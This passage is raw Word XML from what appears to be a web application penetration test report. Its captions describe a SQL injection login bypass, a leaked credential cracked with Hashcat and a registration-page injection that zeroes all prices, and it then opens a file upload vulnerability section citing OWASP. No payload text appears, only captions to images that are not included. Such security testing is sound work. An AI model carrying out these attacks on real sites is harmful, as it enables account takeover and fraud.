          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Login Page Bypass Example </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AFA3A8" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75EAA65A" wp14:editId="3E94D422">
            <wp:extent cx="4572000" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164" name="Picture 19184611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918461162" descr="Tabl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2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B262AD7" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 1: The login page with SQLi password bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22464689" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C2380C6" wp14:editId="490FDF7B">
            <wp:extent cx="4572000" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165"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 descr="Text&#10;&#10;Description automatically generated with low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14:paraId="7D0CB3BB" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 2: The resulting successful login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B581573" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Login Page Credential Leak Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BDB2F" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00FD4A54" wp14:editId="1019276D">
            <wp:extent cx="3429000" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="166" name="Picture 9357292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935729282" descr="Graphical user interface, text, applicatio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9000" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C545E08" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 3: The login page with SQLi credential leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CEE12F" w14:textId="38F38AF3" w:rsidR="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="300A28D6" wp14:editId="10CD6D7A">
            <wp:extent cx="4572000" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170"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2" descr="Graphical user interface, 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0" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC89AE" w14:textId="6E46B65C" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 4: The leaked credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A93C8" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33EDA758" wp14:editId="3F3997C6">
            <wp:extent cx="4552950" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="171" name="Picture 1202805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202805448" descr="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52950" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4422A5" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 5: Hashcat output on the leaked credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45004BE4" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBD452C" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2671EB9F" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B17FB3" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF02906" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DA3D0F" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AA8537" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF1ED42" w14:textId="4A652E35" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Price Modification via Registration SQL Script Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27C43C" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F805CFD" wp14:editId="1A7C0DCF">
            <wp:extent cx="4572000" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172" name="Picture 14534538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453453826" descr="Graphical user interface, applicati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a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A001AB" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 6: SQL script injection on the Registration page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CEF16" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="242A8502" wp14:editId="0E3D6A28">
            <wp:extent cx="4572000" cy="3454400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17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3" descr="Graphical user interface, application, websit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2000" cy="3454400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D0378" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 7: Outcome of script injection that zeros all prices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B02B0" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEWED BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A100048" w14:textId="5450704B" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>David Black</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E7A7E5" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEW OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E561567" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327BD9A5" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDE3FDA" w14:textId="77777777" w:rsidR="005645A0" w:rsidRPr="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F"/>
    <w:p w14:paraId="0D0B60B5" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2706A097" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4A6C16" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217F9367" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B642505" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D96B989" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B10D88" w14:textId="5BECFC45" w:rsidR="00F22AF0" w:rsidRDefault="003001C2" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VULNERABILITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FILE UPLOAD</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460EDCD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESEARCH UNDERTAKEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058FB1AF" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00DF7185" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidR="00F22AF0" w:rsidRPr="005F2D12">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74A042BD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="005F2D12" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t>ile</w:t>
      </w:r>
      <w:r w:rsidRPr="007028FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="007028FD">
        <w:t>pload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> present a considerable risk to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">applications. </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r>
        <w:t>countless</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scenarios t</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">he first step is to get some </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">system. </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t>he attack</w:t>
      </w:r>
      <w:r>
        <w:t>er then</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> only need find a </w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> to get</w:t>
      </w:r>
      <w:r>
        <w:t>ting</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> code executed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D4765" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="005F2D12">
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:t>re are myriad potential</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> consequences </w:t>
      </w:r>
      <w:r>
        <w:t>arising from an</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> unrestricted file upload</w:t>
      </w:r>
      <w:r>
        <w:t>. This could</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> includ</w:t>
      </w:r>
      <w:r>
        <w:t>e:</w:t>
      </w:r>
    </w:p>
